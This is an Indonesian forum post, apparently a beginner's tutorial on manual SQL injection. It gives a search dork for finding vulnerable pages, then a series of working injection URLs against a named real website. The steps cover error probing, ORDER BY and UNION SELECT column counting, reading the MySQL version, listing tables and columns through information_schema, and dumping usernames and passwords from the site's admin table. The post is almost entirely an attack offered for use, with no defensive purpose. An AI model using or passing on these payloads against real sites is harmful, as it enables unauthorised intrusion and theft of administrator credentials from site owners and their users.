kalo kiranya gw salah tolong di koreksi dan yang udah master jangan baca postingan ini ini cuma buat newbie kaya gw 
DORK
Code: Select all
inurl:news_detail.php?id=Code: Select all
http://www.lbpl.in/news_detail.php?id=14kurang lebih seperti di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=14'Code: Select all
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
contoh nya seperti di bawah ini
http://www.lbpl.in/news_detail.php?id=1 ... 20by%201--
tidak menampilkan eror coba gunakan order by 10 atau 100
kurang lebih nya seperti contoh
Code: Select all
http://www.lbpl.in/news_detail.php?id=14%20order%20by%2010-- Code: Select all
http://www.lbpl.in/news_detail.php?id=-14 union all select 1,2,3,4-- setelah angka muncul gunakan perintah VERSION() column angka, contoh nya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,version(),3,4--ternyata versi 5 beruntung lah gw malam ini ck ck soal nya kalo Versi 4 musti tebak tebak table nya ok masalah versi 4 ntr nyusul lagi
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- di belakang column, perintah tersebut untuk mengetahi nama nama table pada database;) kurang lebih contohnya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(TABLE_NAME),3,4%20FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(column_NAME),3,4%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41444d494e-- 
ganti Column_name dengan 0x2b,USERNAME,PASS kurang lebih nya lihat contoh yang terahir kali nya....
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(0x2b,USERNAME,PASS),3,4%20FROM+admin--Cukup sampai di sini Tutorial CUPU dari gw kalo ada salah kata atau penempatan tulisan tolong di koreksi, sekian dan Terima kasih.....
